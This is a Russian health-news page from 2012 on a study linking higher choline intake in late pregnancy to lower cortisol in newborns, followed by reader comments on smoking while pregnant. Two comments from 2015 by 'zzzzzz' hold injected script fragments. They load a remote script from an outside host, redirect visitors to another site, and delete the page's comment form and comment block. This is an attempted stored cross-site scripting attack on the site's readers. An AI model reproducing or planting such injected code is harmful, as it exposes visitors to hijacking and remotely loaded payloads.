Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Мама может спасти своего ...  >>  Мама может спасти своего ребенка от стресса
 
Обратная связь
 

Мама может спасти своего ребенка от стресса

Размер шрифта
24 октября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые обнаружили, что у женщин, которые во время беременности принимают витамин B4 (холин), рождаются дети с низким уровнем гормона стресса кортизола.

мама спасет ребенка

Что такое кортизол

Кортизол – это гормон, который вырабатывается в наружном (корковом) слое надпочечников. Надпочечники представляют собой парные эндокринные железы, прилежащие к верхней части почек.

Выработку кортизола контролирует адренокортикотропный гормон (АКТГ), который синтезируется в гипофизе. Когда кортизола мало, количество АКТГ увеличивается, что приводит к увеличению количества кортизола. Когда кортизола много, количество АКТГ уменьшается, что приводит к уменьшению количества кортизола. Таким образом, регуляция выработки кортизола осуществляется по принципу обратной связи.

Кортизол выполняет в организме большое количество функций: он повышает уровень глюкозы в крови за счет синтеза в печени, подавляет иммунитет, участвует в обмене белков, жиров и углеводов. Кроме того, кортизол выделяется в ответ на стресс и приводит организм в состояние «боеготовности»: повышается уровень глюкозы, которая является основным источником питания для головного мозга, и мобилизует энергетические запасы организма.

Суть исследования

В исследовании приняли участие беременные женщины (III триместр беременности), которые получали 480 или 930 мг холина в день.

В ходе исследования американские ученые установили, что женщины, которые во время беременности получают холин в дозах, превышающих рекомендуемые, делают своих детей стрессоустойчивыми. Прием холина приводит к снижению уровня гормона стресса кортизола у детей, в то время как высокий уровень кортизола сопровождается психическими и метаболическими нарушениями, а также приводит к развитию сердечно-сосудистых заболеваний.

Авторы исследования надеются, что полученные результаты позволят пересмотреть рекомендации относительно приема холина во время беременности. Более высокая доза холина обеспечит оптимальное развитие плода и снизит риск развития заболеваний, возникающих под воздействием стресса.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - SIV_1955

24 октября 2012 в 23:37

Цитировать   |   Пожаловаться

Прочитаешь такую статью и подумаешь, вот какие исследования проводятся.

Теперь мамочки обязательно будут следить за диетой, так ли они питаются, что бы ребеночек родился здоровеньким. А выйдешь на улицу и обомлеешь. Стоят будущие мамочки и с колясками стоят, и у каждой в руке по сигарете.  Вот и будет ребенок "здоровеньким". Это просто беда.  Неужели ради своего ребенка они не могут бросить курить, сколько есть методик и программ  Милые дамы, подумайте о детях, если вы их любите!

2 - Оксана

01 ноября 2012 в 11:19

Цитировать   |   Пожаловаться

Полностью согласна! Пока лежала на сохранении, одну даму положили к нам в палату, вот она значит говорит: "У маня мама всю беременность курила, что с братом, что со мной - и дети родились здоровые!", и тут же через некоторое время: "у меня то эти проблемы со здоровьем, то другие....."  

3 - Оксана

01 ноября 2012 в 11:19

Цитировать   |   Пожаловаться


4 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 23:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Никотин и внематочная беременность   Какие механизмы помогают выносить беременность?   Более миллиона беременных женщин заражены сифилисом! Вы можете быть среди них!   Жизнь наследника британской короны под угрозой  
08 февраля 2013Ожирение можно предсказать сразу после рождения 07 декабря 2012Жизнь наследника британской короны под угрозой
 
25 июля 2012Скоро мы сможем восстанавливаться после травм как ящерицы! 24 июля 2012Организм матери считает плод чужеродным элементом!
 

Слайдшоу

1
Вся правда о месячных и беременности
11 способов узнать, что ты беременна
Что мешает вам забеременеть

Тесты

1
Что есть будущим мамам?
Кофеин вызывает зависимость?
Что вы знаете о груди?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.